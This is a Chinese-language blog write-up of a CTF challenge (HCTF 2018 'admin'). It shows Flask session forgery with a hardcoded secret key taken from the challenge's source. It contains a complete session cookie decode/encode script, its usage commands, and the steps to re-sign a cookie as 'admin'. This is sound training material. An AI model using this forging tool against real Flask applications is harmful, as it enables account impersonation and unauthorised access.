Flask中的session伪造

最新推荐文章于 2024-07-25 16:16:24 发布
最新推荐文章于 2024-07-25 16:16:24 发布
阅读量1.1k 收藏 3
点赞数 2
分类专栏: 打靶笔记 文章标签: flask python web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60716947/article/details/127395519
版权

本文主要以buuctf中的一道题为例来讲解:[HCTF 2018]admin

看了一位师傅的操作,太强了,就来记一下笔记。

Flask之session伪造 - FreeBuf网络安全行业门户

之前做这道题的时候用的是Unicode欺骗,这次试试session伪造。

打开靶机,注册一下,然后登陆,之后看一下自己的session。

然后我们点击change password,在其源代码中可以看到一个GitHub地址,是源码,下载下来

GitHub - woadsl1234/hctf_flask: hctf_flask

之后在app目录下的config.py中找到secret_key:ckj123

import os

class Config(object):
    SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'
    SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:adsl1234@db:3306/test'
    SQLALCHEMY_TRACK_MODIFICATIONS = True

这里放一个大佬的session破解与加密脚本

import sys
import zlib
from itsdangerous import base64_decode
import ast

# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3:  # < 3.0
    raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4:  # >= 3.0 && < 3.4
    from abc import ABCMeta, abstractmethod
else:  # > 3.4
    from abc import ABC, abstractmethod

# Lib for argument parsing
import argparse

# external Imports
from flask.sessions import SecureCookieSessionInterface


class MockApp(object):

    def __init__(self, secret_key):
        self.secret_key = secret_key


if sys.version_info[0] == 3 and sys.version_info[1] < 4:  # >= 3.0 && < 3.4
    class FSCM(metaclass=ABCMeta):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e

        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if (secret_key == None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
else:  # > 3.4
    class FSCM(ABC):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e

        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if (secret_key == None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e

if __name__ == "__main__":
    # Args are only relevant for __main__ usage

    ## Description for help
    parser = argparse.ArgumentParser(
        description='Flask Session Cookie Decoder/Encoder',
        epilog="Author : Wilson Sumanang, Alexandre ZANNI")

    ## prepare sub commands
    subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')

    ## create the parser for the encode command
    parser_encode = subparsers.add_parser('encode', help='encode')
    parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
                               help='Secret key', required=True)
    parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
                               help='Session cookie structure', required=True)

    ## create the parser for the decode command
    parser_decode = subparsers.add_parser('decode', help='decode')
    parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
                               help='Secret key', required=False)
    parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
                               help='Session cookie value', required=True)

    ## get args
    args = parser.parse_args()

    ## find the option chosen
    if (args.subcommand == 'encode'):
        if (args.secret_key is not None and args.cookie_structure is not None):
            print(FSCM.encode(args.secret_key, args.cookie_structure))
    elif (args.subcommand == 'decode'):
        if (args.secret_key is not None and args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value, args.secret_key))
        elif (args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value))

脚本使用方法:
解密:python flask_session_cookie_manager3.py decode -s "secret_key" -c "需要解密的session值"
加密:python flask_session_cookie_manager3.py encode -s "secret_key" -t "需要加密的session值"

先解密:

可以看到变成明文了,再将其中的name值改为admin,再加密:

 

然后将加密出来的session替换原来的刷新一下页面就可以了

 

拿到flag 

清丶酒孤欢ゞ
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
flasksession伪造问题
m0_62422842的博客
09-05 2587
flasksession伪造问题,涉及两道ctf题目,一道主要考察session伪造,另一道session伪造与py反序列化结合考察。
Flasksession伪造
TenG的博客
05-22 3911
前言 本文结合CTF遇到的题目来说一下session伪造,虽然已经有很多师傅写了,而且写的都特别好,但是还是想自己记录一下,也方便以后复习。ciscn就有一个session伪造的题,由于之前没有做过就没做出来,还是有点遗憾的。但比较戏剧性的是,上午比赛刚结束,下午刷BUU的时候就遇到了同样的题目。嗐,还是自己太菜,下面就结合BUUCTF的[HCTF 2018]admin来说一下,文比较拙劣的地方还请师傅们指正一下。参考文章 正文 本来这个题是有三种解法的,分别是:flask session伪造、Un
flask session伪造
shao65308的专栏
11-10 146
修改为:{'is_admin': True, 'name': 'admin', 'user_id': 1}生成所有可能的secre_key文件。爆破是用了哪个secre_key。把生成的字符串替换Cookie值。
【CTF】buuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗
m0_52923241的博客
08-23 1814
[HCTF 2018]admin 这里有两个选项,点击register注册一个新账户 下面这就算是登进来了 查看源码 提示you are not admin,可能需要登录admin才能获取我们想要的东西
为idhttp伪造session
baduan2162的博客
01-30 212
很多网站使用了session来 记录用户登录状态,idhttp本身是不记录session的, 需要通过一些技术手段来伪造session。以Get为例,idhttp伪造session IdHttp1.Get(mURL1); mStr := IdHttp1.Response.CustomHeaders.Values['Set-Cookie']; if Pos(';',mSt...
php 跨站点请求伪造,CSRF(跨站点请求伪造)在Flash的利用
weixin_39733821的博客
03-24 63
0x00 前言CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往...
java 跨站请求伪造_跨站请求伪造—CSRF
weixin_35565522的博客
02-19 470
CSRF 介绍CSRF,是跨站请求伪造(Cross Site Request Forgery)的缩写,是一种劫持受信任用户向服务器发送非预期请求的攻击方式。通常情况下,CSRF 攻击是攻击者借助受害者的 Cookie 骗取服务器的信任,在受害者毫不知情的情况下以受害者名义伪造请求发送给受攻击服务器,从而在并未授权的情况下执行在权限保护之下的操作。CSRF 攻击示例这里有一个网站,用户可以看文章,登...
HCTFadmin--关于flasksession伪造和unicode的欺骗
unexpectedthing的博客
11-07 863
文章目录CTF题目非预期解预期解解法1---flask session伪造解法2----Unicode欺骗解法3---条件竞争 CTF题目 地址:HCTF-admin 非预期解 可以直接登录,利用弱口令 login页面,账号:admin,密码:123,就直接得到flag 预期解 首先进去看到几个界面,login,register,和登录成功后(自己注册然后登录)的四个界面。 然后在index页面源码发现提示,you are not admin,估计题目是让我们登录成admin,然后出flag,于是想到cha
伪造html页面,跨站点请求伪造漏洞验证方法
weixin_30067913的博客
06-03 566
CSS布局HTML小编今天和大家分享帮助解决漏洞:CSRF跨站点请CSS布局HTML小编今天和大家分享伪造,十分下面是CSRF的常见特性: 依靠用户标识危害网站 利用网站对用户标识的信任 欺骗用户的浏览器发送HTTP请CSS布局HTML小编今天和大家分享给目标站点 另外可以通过IMG标签会触发一个GET请CSS布局HTML小编今天和大家分享,可以利用它来实现CSRF攻击。 CSRF攻击依赖下面的假...
Cookie、Session、Token
CrankZ的博客
11-28 459
HTTP无状态 而Web应用程序是使用HTTP协议传输数据的。HTTP协议是无状态的协议。一旦数据交换完毕,客户端与服务器端的连接就会关闭,再次交换数据需要建立新的连接。这就意味着服务器无法从连接上跟踪会话。就是说假如你去网上购物,把喜欢的商品加到购物车,因为HTTP是无状态的协议,一旦你的浏览器关闭,下次打开的时候,你上次购物车的商品都没了。这种体验肯定是很差的,所有需要一种机制解决这个问题...
Laravel开发-session
08-28
使用`\Session::flash('key', 'value')`存储闪存数据,这些数据将在下一次请求后自动清除。 5. **会话间件**: Laravel的会话间件负责处理会话开始、结束以及数据的读写。在每个请求开始时,间件会自动启动...
play-scala-secure-session-example:显示加密会话管理的示例Play应用程序
02-06
在`app/views`目录下的模板文件,可以通过`@session`或`@flash`注解来访问会话数据,展示在页面上。 **7. 安全实践** 除了基础的会话管理,示例还可能涵盖了其他安全实践,如使用HTTPS、设置会话超时时间、防止跨...
PHP实例开发源码—Flexsns-sky完全FLASH许愿天空(php许愿墙).zip
11-11
- **CSRF(跨站请求伪造)防护**:使用令牌机制确保请求来源的有效性。 7. **模板引擎** - **可能使用模板引擎**如Smarty,分离业务逻辑与视图展示,方便维护和设计。 - **动态生成HTML**:根据PHP变量生成动态...
Laravel开发-sessions
08-28
session()->flash('message', '数据已成功保存!'); ``` 用户看到消息后,该数据将在下一个请求自动清除。 ### 5. 检查会话状态 检查会话是否存在某个键: ```php if (session()->has('key')) { // 会话...
python使用flask,调用文件方法
qq_34631220的博客
07-24 272
【代码】python使用flask,调用文件方法。
LiteLLM
编码时光
07-25 973
一、关于 LiteLLM🚅 企业级 我们为什么要建造这个? 二、用法 异步 流 日志可观测性 三、OpenAI代理 📖代理端点 快速启动代理-CLI 第1步:启动litellm代理 第2步:向代理发出ChatCompletions请求 代理密钥管理 请求 预期反应 四、支持的 Providers 五、贡献
基于flask的天气数据可视化系统1.0
最新发布
lyccomcn的博客
07-25 155
Flask是一个基于PythonWeb开发框架,它以灵活、微框架著称,基于werkzeug的轻量级web框架,可提高web应用的开发效率。首先,需要实例化一个Flask对象,然后设置一个路由,路由就是处理url到Python函数之间关系的程序,在Flask框架通过@app.route装饰器来表示。也就是说,客户端将请求发送给web服务器,web服务器再将请求发送给Flask程序示例,程序示例需要知道每个url请求要运行哪些代码,所以需要建立一个url到python函数的映射。
How can I fix my Flask server‘s 405 error that includes OpenAi api?
suiusoar
07-25 1024
解决包含OpenAI API的Flask服务器出现的405错误(Method Not Allowed,即方法不允许)
postman伪造session
09-12
在使用Postman进行接口测试时,可以通过在Headers添加Cookie来伪造Session。具体步骤如下: 1. 打开接口文档,找到要测试的接口,并查看是否需要登录和身份验证。 2. 如果需要登录和身份验证,在Headers配置请求头信息。其,Cookie是验证身份的重要依据,需要将Cookie信息填入Headers。 3. 将Cookie信息填入Headers tab下,如有其他Header参数信息,也需要填入。 4. 点击发送(Send)按钮,观察响应是否符合预期。 通过以上步骤,你可以在Postman伪造Session来进行接口测试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

清丶酒孤欢ゞ

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值